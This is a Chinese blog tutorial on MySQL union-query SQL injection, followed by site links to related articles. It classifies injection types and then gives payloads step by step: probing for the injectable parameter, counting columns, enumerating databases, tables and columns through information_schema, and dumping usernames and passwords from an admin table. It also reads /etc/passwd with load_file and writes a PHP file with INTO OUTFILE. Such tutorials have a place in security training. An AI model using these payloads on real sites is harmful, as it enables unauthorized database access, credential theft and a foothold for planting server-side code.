SQL注入——联合查询注入

最新推荐文章于 2024-05-28 20:11:32 发布
最新推荐文章于 2024-05-28 20:11:32 发布
阅读量2.2k 收藏 8
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dust_hk/article/details/86514268
版权

0x01 SQL注入的原理
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原
有SQL结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结外一下
两个原因叠加造成的:
1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。
0x02 SQL注入的分类
一、根据注入点数据类型
1.整型注入

在 Web 端大概是 http://xxx.com/news.php?id=1 这种形式,其注入点 id
类型为数字,所以叫数字型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where
id=1。组合出来的sql注入语句为:select * from news where id=1 and 1=1

2.字符串型注入

在 Web 端大概是 http://xxx.com/news.php?name=admin 这种形式,其注入点 name
类型为字符类型,所以叫字符型注入点。这一类的 SQL 语句原型大概为 select * from 表名 where
name=‘admin’。注意多了引号。组合出来的sql注入语句为:select * from news where chr=‘admin’
and 1=1 ’ ’

闭合单引号chr=‘admin’ union select 1,2,3,4 and ‘1’='1 ====>
chr=‘admin’(闭合前面单引号) union select 1,2,3,4 and ‘1’=‘1’

3.搜索型注入

这是一类特殊的注入类型。这类注入主要是指在进行数据搜索时没过滤搜索参数,一般在链接地址中有“keyword=关键字”,有的不显示在的链接地址里面,而是直接通过搜索框表单提交。此类注入点提交的
SQL 语句,其原形大致为:select * from 表名 where 字段 like ‘%关键字%’。

组合出来的sql注入语句为:select * from news where search like ‘%测试 %’ and
‘%1%’=’%1%’

测试%’ union select 1,2,3,4 and ‘%’=’

区分标准:SQL语句中查询条件的数据类型

二、根据注入的语法分类
1.联合查询注入:可以使用union的情况下的注入。
2.报错型注入:即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
3.布尔型注入:即可以根据返回页面判断条件真假的注入。
4.基于时间延迟注入:即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
5.可多语句查询注入(宽字节注入):可以同时执行多条语句的执行时的注入,也叫堆查询注入。

0x02 联合查询注入的条件
(速度最快)
1.存在注入点
2.有显示位
0x03 联合查询注入步骤
一、判断注入类型

  1. and 1=1 / and 1=2 回显页面不同(整型判断)
  2. 单引号判断 ’ 显示数据库错误信息或者页面回显不同(整型或字符串类型判断)
  3. \(转义符)
  4. -1 / +1回显下一个或上一个页面(整型判断)
  5. and sleep(5) (判断页面返回时间)

二、判断字段数
order by 10
……
使用二分法判断

三、判断显示位

php?id=-1 union select 1,2,3,4,5


php?id=-1 union select null,null,null,null,null


php?id=-1 union select (1),(2),(3),(4),(5)

四、获取当前数据库名称和当前连接数据库用户

php?id=-1 union select 1,2,database(),4,5

php?id=-1 union select 1,2,user(),4,5

五、列出所有数据库
使用limit一个一个的打印出来库名

select schema_name from infromation_schema.schemata limit 0,1

使用group_concat()一次性显示全部

说明:group_concat()函数可在一行显示所有查询结果。
concat_ws(分隔符,str1,str2,……)函数可以同时显示多个字段,并以 分隔符 分开。
concat(str1,str2,str3,…)函数可以同时显示多个字段,其中有一个字段为null,则返回null。

select group_concat(schema_name) from information_schema.schemata

六、列出数据库中所有的表
通过limit一个一个打印出来

select table_name from information_schema.tables where table_schema='数据库名' limit 0,1

通过group_concat()函数一次性全部显示

select group_concat(table_name) from information_schema.tables where table_schema = '数据库名'

注意:数据库名称可以用十六进制来代替字符,这样可以绕过限制

七、列出所有字段(数据库:test 表:admin)
limit一个一个的打印出来

select column_name from information_schema.columns where table_schema='test' and table_name='admin' limit 0,1

group_concat()一次性全部显示

select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'

八、列出数据(数据库:test 表:admin)
limit一个一个打印出来

selec username,passwd from test.admin limit 0,1

group_concat()一次性全部显示

select group_concat(concat(username,0x20,passwd)) from test.admin

0x20-->空格

0x04 MySQL读写文件函数利用

load_file() 函数
读文件操作
前提:

  • 知道文件绝对路径

  • 能够使用union查询

  • 对web目录有写权限

    union select 1,load_file(’/etc/passwd’),3,4,5,6#
    union select 1,load_file(十六进制代码),3,4,5,6#

into outfile()
写文件操作
前提:

  • 文件名必须全路径(局对路径)

  • 用户必须有写文件的权限

  • 没有对 ’ 单引号过滤

    selec ‘<?php phpinfo();?>’ into outfile ‘c:\windows\tmp\1.php’

北境L
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sql联合查询注入
m0_65977612的博客
11-18 936
sql联合查询注入
联合查询注入
weixin_46622976的博客
03-23 530
SQL注入、联合注入
sql注入利用group_concat函数
最新发布
m0_70638961的博客
05-28 332
这里我使用的是sqllab-less1,通过对数据库的查询,我们发现数据库表名,列名,等数据在information_schema数据库中。但是这样只能回显某一个表,这时就可以使用group_concat函数把security的每一个表回显出来。首先根据group by指定的列进行分组,将同一组的列显示出来,并且用分隔符分隔。这里我们选择users表回显出用户名username和密码password。当库名、表名、列名都查到了之后,选择最有用的回显出来就成功的注入了。当然这是最简单的注入
2.1 union联合查询注入
n0d_xy的博客
04-14 1310
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
SQL注入group_concat()函数是否需要使用?
Firebasky的博客
07-28 1844
我们在SQL注入的过程中,到底需不需要使用group_concat()函数? 今天在做buuctf里面的一道SQL注入的题是发现了这个问题,于是自己来记录一下。 也为了分享知识!!! 进入正题: 要弄清楚这个问题我们就需要了解group_concat()函数的作用 参考链接group_concat()函数讲解 上面说的非常清楚 总结来说就是将数据放在一起。 下面放一张自己的实验照片。方便理解。 好了现在我们知道了这个函数的作用。我们就来看看SQL注入的语句。 假如有下面的注入语句。查询password数据
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
sql注入初学——松风1
08-03
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能正确过滤或验证用户输入的情况下,允许攻击者向SQL查询中插入恶意代码。本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 ...
SQL注入漏洞全接触——高级篇.txt
02-13
看完入门篇和进阶篇后,稍加练习,破解...5. 猜解Access时只能用Ascii逐字解码法,SQLServer也可以用这种方法,只需要两者之间的区别即可,但是如果能用SQLServer的报错信息把值暴露出来,那效率和准确率会有极大的提高
啊D——SQL注入工具
12-01
啊D注入工具
SQL注入中group_concat的学习笔记(转载)
weixin_45897324的博客
10-07 2018
SQL注入中group_concat的学习笔记 mysql中的information_schema 结构用来存储数据库系统信息 information_schema 结构中这几个表存储的信息,在注入中可以用到的几个表。 SCHEMATA :存储数据库名的, ——>关键字段:SCHEMA_NAME,表示数据库名称 TABLES :存储表名的 ——>关键字段:TABLE_SCHEMA表示表所属的数据库名称; ——>关键字段:TABLE_NAME表示所属的表的名称 COLUMNS :存储字
SQL注入中group_concat的学习笔记
kofi的博客,已停更
04-07 1377
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
张小白的渗透之路(六)——SQL注入的思路、流程及SQL的CONCAT系列函数、Information_schema数据库讲解
Litbai_zhang
10-31 2022
前言 关于SQL注入理论的内容,小白之前的博客有写,有兴趣的可以去看一看哦~SQL注入原理详解 实践 ps: 实验的环境小白用的sqli-labs的第一关,下面让我们开始吧 第一关呢提示我们可以用数字型的注入就可以过啦 我们在url输入 ?id=1 结果显示通关啦 当然,小白的目的不是写通关攻略,所以接下来让我们继续以这个例子来更深入的理解一下SQL注入的思路。 那么比方说我现在想获取的是数...
SQL注入
qq_31088019的博客
08-04 1804
sql注入
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 643
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
SQL注入之MYSQL注入
av11566的博客
04-19 7101
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 612
sql注入基础操作及相关sqli-labs关卡通关流程
buuctf love sql 保姆级攻略,看完就会,5分钟速成union联合注入
weixin_74320581的博客
05-17 418
buuctf love sql 从0到1 保姆级攻略
理解SQL注入:网络安全技术解析
这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库中的数据或者获取未经授权的信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

北境L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值